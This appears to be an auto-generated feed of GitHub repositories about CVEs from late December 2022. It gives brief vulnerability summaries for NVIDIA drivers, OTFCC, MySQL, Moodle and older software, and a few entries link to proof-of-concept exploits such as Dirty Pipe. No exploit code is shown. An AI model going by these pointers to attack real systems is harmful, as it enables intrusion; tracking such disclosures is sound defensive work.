**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an unprivileged regular user can cause an integer to be truncated, which may lead to denial of service or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34677](https://github.com/Live-Hack-CVE/CVE-2022-34677) create time: 2022-12-31T16:42:25Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an out-of-bounds read may lead to denial of service, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34676](https://github.com/Live-Hack-CVE/CVE-2022-34676) create time: 2022-12-31T16:42:21Z

**NVIDIA Display Driver for Linux contains a vulnerability in the Virtual GPU Manager, where it does not check the return value from a null-pointer dereference, which may lead to denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34675](https://github.com/Live-Hack-CVE/CVE-2022-34675) create time: 2022-12-31T16:42:18Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where a helper function maps more physical pages than were requested, which may lead to undefined behavior or an information leak. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34674](https://github.com/Live-Hack-CVE/CVE-2022-34674) create time: 2022-12-31T16:42:14Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer (nvidia.ko), where an out-of-bounds array access may lead to denial of service, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34673](https://github.com/Live-Hack-CVE/CVE-2022-34673) create time: 2022-12-31T16:42:11Z

**NVIDIA Control Panel for Windows contains a vulnerability where an unauthorized user or an unprivileged regular user can compromise the security of the software by gaining privileges, reading sensitive information, or executing commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34672](https://github.com/Live-Hack-CVE/CVE-2022-34672) create time: 2022-12-31T16:42:08Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can cause an out-of-bounds write, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data tampering. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34671](https://github.com/Live-Hack-CVE/CVE-2022-34671) create time: 2022-12-31T16:42:04Z

**NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer handler, where an unprivileged regular user can cause truncation errors when casting a primitive to a primitive of smaller size causes data to be lost in the conversion, which may lead to denial of service or information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34670](https://github.com/Live-Hack-CVE/CVE-2022-34670) create time: 2022-12-31T16:42:01Z

**NVIDIA GPU Display Driver for Windows contains a vulnerability in the user mode layer, where an unprivileged regular user can access or modify system files or other files that are critical to the application, which may lead to code execution, denial of service, escalation of privileges, information disclosure, or data CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34669](https://github.com/Live-Hack-CVE/CVE-2022-34669) create time: 2022-12-31T16:41:58Z

**An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48195](https://github.com/Live-Hack-CVE/CVE-2022-48195) create time: 2022-12-31T16:41:51Z

**Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 2.0.0-beta1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4867](https://github.com/Live-Hack-CVE/CVE-2022-4867) create time: 2022-12-31T16:41:47Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4866](https://github.com/Live-Hack-CVE/CVE-2022-4866) create time: 2022-12-31T16:41:43Z

**Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4865](https://github.com/Live-Hack-CVE/CVE-2022-4865) create time: 2022-12-31T16:41:40Z

**Improper Authorization in GitHub repository froxlor/froxlor prior to 2.0.0-beta1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4868](https://github.com/Live-Hack-CVE/CVE-2022-4868) create time: 2022-12-31T16:41:37Z

**Poc exploit in CVE-2022-21907 . And testing the presence of cve** : [Vicki568/CVE-2022-21907](https://github.com/Vicki568/CVE-2022-21907) create time: 2022-12-31T09:58:28Z

**no description** : [pmihsan/-Dirty-Pipe-CVE-2022-0847](https://github.com/pmihsan/-Dirty-Pipe-CVE-2022-0847) create time: 2022-12-30T17:17:44Z

**The results of my small term paper on the topic of the Internet of Vulnerable Things and the exploit for CVE-2022-48194.** : [otsmr/internet-of-vulnerable-things](https://github.com/otsmr/internet-of-vulnerable-things) create time: 2022-12-29T10:32:23Z

**Buffer overflow in Yahoo Pager/Messenger client allows remote attackers to cause a denial of service via a long URL within a message. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0047](https://github.com/Live-Hack-CVE/CVE-2000-0047) create time: 2022-12-30T06:48:30Z

**The initscripts package in Red Hat Linux allows local users to gain privileges via a symlink attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0031](https://github.com/Live-Hack-CVE/CVE-2000-0031) create time: 2022-12-30T06:48:27Z

**The CartIt shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0137](https://github.com/Live-Hack-CVE/CVE-2000-0137) create time: 2022-12-30T06:48:24Z

**iPlanet Web Server 4.1 allows remote attackers to cause a denial of service via a large number of GET commands, which consumes memory and causes a kernel panic. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0182](https://github.com/Live-Hack-CVE/CVE-2000-0182) create time: 2022-12-30T06:48:20Z

**WebSite Pro allows remote attackers to determine the real pathname of webdirectories via a malformed URL request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0066](https://github.com/Live-Hack-CVE/CVE-2000-0066) create time: 2022-12-30T06:47:37Z

**glFtpD includes a default glftpd user account with a default password and a UID of 0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0038](https://github.com/Live-Hack-CVE/CVE-2000-0038) create time: 2022-12-30T06:47:34Z

**WebWho+ whois.cgi program allows remote attackers to execute commands via shell metacharacters in the TLD parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0010](https://github.com/Live-Hack-CVE/CVE-2000-0010) create time: 2022-12-30T06:47:10Z

**Sample Internet Data Query (IDQ) scripts in IIS 3 and 4 allow remote attackers to read files via a .. (dot dot) attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0126](https://github.com/Live-Hack-CVE/CVE-2000-0126) create time: 2022-12-30T06:46:43Z

**The @Retail shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0135](https://github.com/Live-Hack-CVE/CVE-2000-0135) create time: 2022-12-30T06:46:40Z

**Hotmail does not properly filter JavaScript code from a user's mailbox, which allows a remote attacker to execute the code by using hexadecimal codes to specify the javascript: protocol, e.g. jAvascript. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0081](https://github.com/Live-Hack-CVE/CVE-2000-0081) create time: 2022-12-30T06:46:36Z

**The mcsp Client Site Processor system (MultiCSP) in Standard and Poor's ComStock is installed with several accounts that have no passwords or easily guessable default passwords. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0109](https://github.com/Live-Hack-CVE/CVE-2000-0109) create time: 2022-12-30T06:46:33Z

**Internet Explorer 5.0 and 5.01 allows remote attackers to bypass the cross frame security policy and read files via the external.NavigateAndFind function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0028](https://github.com/Live-Hack-CVE/CVE-2000-0028) create time: 2022-12-30T06:46:15Z

**The Check It Out shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0134](https://github.com/Live-Hack-CVE/CVE-2000-0134) create time: 2022-12-30T06:45:37Z

**Buffer overflow in InetServ 3.0 allows remote attackers to execute commands via a long GET request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0065](https://github.com/Live-Hack-CVE/CVE-2000-0065) create time: 2022-12-30T06:45:06Z

**glFtpD allows local users to gain privileges via metacharacters in the SITE ZIPCHK command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0040](https://github.com/Live-Hack-CVE/CVE-2000-0040) create time: 2022-12-30T06:44:46Z

**IMail POP3 daemon uses weak encryption, which allows local users to read files. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0019](https://github.com/Live-Hack-CVE/CVE-2000-0019) create time: 2022-12-30T06:44:29Z

**Buffer overflow in the SHGetPathFromIDList function of the Serv-U FTP server allows attackers to cause a denial of service by performing a LIST command on a malformed .lnk file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0129](https://github.com/Live-Hack-CVE/CVE-2000-0129) create time: 2022-12-30T06:44:04Z

**The Make-a-Store OrderPage shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0101](https://github.com/Live-Hack-CVE/CVE-2000-0101) create time: 2022-12-30T06:43:50Z

**FTPPro allows local users to read sensitive information, which is stored in plain text. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0008](https://github.com/Live-Hack-CVE/CVE-2000-0008) create time: 2022-12-30T06:43:30Z

**The SSH protocol server sshd allows local users without shell access to redirect a TCP connection through a service that uses the standard system password database for authentication, such as POP or FTP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0143](https://github.com/Live-Hack-CVE/CVE-2000-0143) create time: 2022-12-30T06:42:55Z

**The SalesCart shopping cart application allows remote users to modify sensitive purchase information via hidden form fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0102](https://github.com/Live-Hack-CVE/CVE-2000-0102) create time: 2022-12-30T06:42:22Z

**Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0114](https://github.com/Live-Hack-CVE/CVE-2000-0114) create time: 2022-12-30T06:42:19Z

**The authentication protocol in Timbuktu Pro 2.0b650 allows remote attackers to cause a denial of service via connections to port 407 and 1417. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0142](https://github.com/Live-Hack-CVE/CVE-2000-0142) create time: 2022-12-30T06:42:15Z

**DNS PRO allows remote attackers to conduct a denial of service via a large number of connections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2000-0020](https://github.com/Live-Hack-CVE/CVE-2000-0020) create time: 2022-12-30T06:41:51Z

**Cross-site scripting (XSS) vulnerability in the ICQ Web Front guestbook (guestbook.html) allows remote attackers to insert arbitrary web script and HTML via the message field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-0769](https://github.com/Live-Hack-CVE/CVE-2003-0769) create time: 2022-12-30T06:47:41Z

**Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-0658](https://github.com/Live-Hack-CVE/CVE-2003-0658) create time: 2022-12-30T06:46:29Z

**Buffer overflow vulnerability in write_node in htmldoc through 1.9.11 allows attackers to cause a denial of service via htmldoc/htmldoc/html.cxx:588. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33235](https://github.com/Live-Hack-CVE/CVE-2021-33235) create time: 2022-12-30T06:40:19Z

**Buffer Overflow vulnerability in write_header in htmldoc through 1.9.11 allows attackers to casue a denial of service via /htmldoc/htmldoc/html.cxx:273. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33236](https://github.com/Live-Hack-CVE/CVE-2021-33236) create time: 2022-12-30T06:40:16Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39035](https://github.com/Live-Hack-CVE/CVE-2021-39035) create time: 2022-12-30T06:37:42Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39085](https://github.com/Live-Hack-CVE/CVE-2021-39085) create time: 2022-12-30T06:37:15Z

**IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 could allow an authenticated user to obtain sensitive information due to improper permission controls. IBM X-Force ID: 216109. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39087](https://github.com/Live-Hack-CVE/CVE-2021-39087) create time: 2022-12-30T06:37:12Z

**IBM Sterling File Gateway 6.0.0.0 through 6.0.3.5, 6.1.0.0 through 6.1.0.4, and 6.1.1.0 through 6.1.1.1 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39086](https://github.com/Live-Hack-CVE/CVE-2021-39086) create time: 2022-12-30T06:37:05Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6171b2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35464](https://github.com/Live-Hack-CVE/CVE-2022-35464) create time: 2022-12-30T06:41:48Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b0478. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35463](https://github.com/Live-Hack-CVE/CVE-2022-35463) create time: 2022-12-30T06:41:44Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6c0a32. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35461](https://github.com/Live-Hack-CVE/CVE-2022-35461) create time: 2022-12-30T06:41:41Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6c0bc3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35462](https://github.com/Live-Hack-CVE/CVE-2022-35462) create time: 2022-12-30T06:41:38Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x61731f. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35460](https://github.com/Live-Hack-CVE/CVE-2022-35460) create time: 2022-12-30T06:41:34Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x617087. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35456](https://github.com/Live-Hack-CVE/CVE-2022-35456) create time: 2022-12-30T06:41:31Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6e412a. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35459](https://github.com/Live-Hack-CVE/CVE-2022-35459) create time: 2022-12-30T06:41:27Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b05ce. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35458](https://github.com/Live-Hack-CVE/CVE-2022-35458) create time: 2022-12-30T06:41:24Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b0d63. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35455](https://github.com/Live-Hack-CVE/CVE-2022-35455) create time: 2022-12-30T06:41:20Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b05aa. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35454](https://github.com/Live-Hack-CVE/CVE-2022-35454) create time: 2022-12-30T06:41:14Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6c08a6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35453](https://github.com/Live-Hack-CVE/CVE-2022-35453) create time: 2022-12-30T06:41:10Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b03b5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35451](https://github.com/Live-Hack-CVE/CVE-2022-35451) create time: 2022-12-30T06:40:43Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b84b1. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35450](https://github.com/Live-Hack-CVE/CVE-2022-35450) create time: 2022-12-30T06:40:40Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b0b2c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35452](https://github.com/Live-Hack-CVE/CVE-2022-35452) create time: 2022-12-30T06:40:37Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b04de. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35447](https://github.com/Live-Hack-CVE/CVE-2022-35447) create time: 2022-12-30T06:40:33Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b55af. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35448](https://github.com/Live-Hack-CVE/CVE-2022-35448) create time: 2022-12-30T06:40:30Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b0466. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35449](https://github.com/Live-Hack-CVE/CVE-2022-35449) create time: 2022-12-30T06:40:26Z

**There is an improper access control vulnerability in Portal for ArcGIS versions 10.8.1 and below which could allow a remote, unauthenticated attacker to access an API that may induce Esri Portal for ArcGIS to read arbitrary URLs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38184](https://github.com/Live-Hack-CVE/CVE-2022-38184) create time: 2022-12-30T06:40:23Z

**An issue was discovered in rageframe2 2.6.37. There is a XSS vulnerability in the user agent related parameters of the info.php page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36530](https://github.com/Live-Hack-CVE/CVE-2022-36530) create time: 2022-12-30T06:40:12Z

**Mingsoft MCMS 5.2.8 was discovered to contain a SQL injection vulnerability in /mdiy/model/delete URI via models Lists. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36599](https://github.com/Live-Hack-CVE/CVE-2022-36599) create time: 2022-12-30T06:40:09Z

**Apache Airflow Docker's Provider prior to 3.0.0 shipped with an example DAG that was vulnerable to (authenticated) remote code exploit of code on the Airflow worker host. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38362](https://github.com/Live-Hack-CVE/CVE-2022-38362) create time: 2022-12-30T06:40:05Z

**Clinic's Patient Management System v1.0 is vulnerable to SQL Injection via /pms/update_medicine.php?id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36242](https://github.com/Live-Hack-CVE/CVE-2022-36242) create time: 2022-12-30T06:40:01Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6b544e. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35474](https://github.com/Live-Hack-CVE/CVE-2022-35474) create time: 2022-12-30T06:39:58Z

**OTFCC v0.10.4 was discovered to contain a segmentation violation via /release-x64/otfccdump+0x4fe9a7. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35473](https://github.com/Live-Hack-CVE/CVE-2022-35473) create time: 2022-12-30T06:39:55Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6e41a8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35475](https://github.com/Live-Hack-CVE/CVE-2022-35475) create time: 2022-12-30T06:39:51Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x65fc97. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35470](https://github.com/Live-Hack-CVE/CVE-2022-35470) create time: 2022-12-30T06:39:48Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6e41b0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35471](https://github.com/Live-Hack-CVE/CVE-2022-35471) create time: 2022-12-30T06:39:44Z

**OTFCC v0.10.4 was discovered to contain a global overflow via /release-x64/otfccdump+0x718693. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35472](https://github.com/Live-Hack-CVE/CVE-2022-35472) create time: 2022-12-30T06:39:41Z

**OTFCC v0.10.4 was discovered to contain a heap-buffer overflow via /release-x64/otfccdump+0x6e41b8. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35467](https://github.com/Live-Hack-CVE/CVE-2022-35467) create time: 2022-12-30T06:39:38Z

**Apps developed with Google Play Services SDK incorrectly had the mutability flag set to PendingIntents that were passed to the Notification service. As Google Play services SDK is so widely used, this bug affects many applications. For an application affected, this bug will let the attacker, gain the access to all non- CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2390](https://github.com/Live-Hack-CVE/CVE-2022-2390) create time: 2022-12-30T06:39:34Z

**SSRF (Server Side Request Forgery) in Cockpit 0.13.0 allows remote attackers to read arbitrary files or send TCP traffic to intranet hosts via the url parameter, related to use of the discontinued aheinze/fetch_url_contents component. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-14611](https://github.com/Live-Hack-CVE/CVE-2017-14611) create time: 2022-12-30T05:57:11Z

**There is an overflow bug in the AVX2 Montgomery multiplication procedure used in exponentiation with 1024-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH1024 are co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3738](https://github.com/Live-Hack-CVE/CVE-2017-3738) create time: 2022-12-30T05:22:06Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3173](https://github.com/Live-Hack-CVE/CVE-2018-3173) create time: 2022-12-30T05:23:40Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3277](https://github.com/Live-Hack-CVE/CVE-2018-3277) create time: 2022-12-30T05:23:37Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3200](https://github.com/Live-Hack-CVE/CVE-2018-3200) create time: 2022-12-30T05:23:34Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2810](https://github.com/Live-Hack-CVE/CVE-2018-2810) create time: 2022-12-30T05:23:30Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.60 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3063](https://github.com/Live-Hack-CVE/CVE-2018-3063) create time: 2022-12-30T05:23:26Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.23 and prior and 8.0.12 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-3162](https://github.com/Live-Hack-CVE/CVE-2018-3162) create time: 2022-12-30T05:23:23Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2777](https://github.com/Live-Hack-CVE/CVE-2018-2777) create time: 2022-12-30T05:23:19Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2759](https://github.com/Live-Hack-CVE/CVE-2018-2759) create time: 2022-12-30T05:23:16Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior, 5.6.39 and prior and 5.7.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-2781](https://github.com/Live-Hack-CVE/CVE-2018-2781) create time: 2022-12-30T05:23:13Z

**Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.6.42 and prior, 5.7.24 and prior and 8.0.13 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-2481](https://github.com/Live-Hack-CVE/CVE-2019-2481) create time: 2022-12-30T05:24:16Z

**If an application encounters a fatal protocol error and then calls SSL_shutdown() twice (once to send a close_notify, and once to receive one) then OpenSSL can respond differently to the calling application if a 0 byte record is received with invalid padding compared to if a 0 byte record is received with an invalid MA CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1559](https://github.com/Live-Hack-CVE/CVE-2019-1559) create time: 2022-12-30T05:22:38Z

**A flaw was found in automationbroker/apb container in versions up to and including 2.0.4-1. This container grants all users sudoer permissions allowing an unauthorized user with access to the running container the ability to escalate their own privileges. The highest threat from this vulnerability is to data confidenti CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10728](https://github.com/Live-Hack-CVE/CVE-2020-10728) create time: 2022-12-30T06:05:37Z

**In Moodle before 3.9.1, 3.8.4 and 3.7.7, the filter in the admin task log required extra sanitizing to prevent a reflected XSS risk. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14320](https://github.com/Live-Hack-CVE/CVE-2020-14320) create time: 2022-12-30T06:05:30Z

**In Moodle before 3.8.2, 3.7.5, 3.6.9 and 3.5.11, X-Forwarded-For headers could be used to spoof a user's IP, in order to bypass remote address checks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1755](https://github.com/Live-Hack-CVE/CVE-2020-1755) create time: 2022-12-30T06:05:05Z

**A flaw was found in Red Hat AMQ Broker in a way that a XEE attack can be done via Broker's configuration files, leading to denial of service and information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14379](https://github.com/Live-Hack-CVE/CVE-2020-14379) create time: 2022-12-30T06:05:02Z

**In Moodle before 3.8.2, 3.7.5, 3.6.9 and 3.5.11, insufficient input escaping was applied to the PHP unit webrunner admin tool. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1756](https://github.com/Live-Hack-CVE/CVE-2020-1756) create time: 2022-12-30T06:04:58Z

**Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect permissions vulnerability in the Integrations component. This vulnerability could be abused by authenticated users with permissions to the Resource Access API to delete customer details via the REST API without authorization. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-24402](https://github.com/Live-Hack-CVE/CVE-2020-24402) create time: 2022-12-30T05:22:14Z

**Cross Site Scripting (XSS) vulnerability exists in the phpgurukul Online Marriage Registration System 1.0 allows attackers to run arbitrary code via the wzipcode field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-23466](https://github.com/Live-Hack-CVE/CVE-2020-23466) create time: 2022-12-30T05:19:37Z

**lib/omniauth/failure_endpoint.rb in OmniAuth before 1.9.2 (and before 2.0) does not escape the message_key value. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36599](https://github.com/Live-Hack-CVE/CVE-2020-36599) create time: 2022-12-30T05:18:16Z

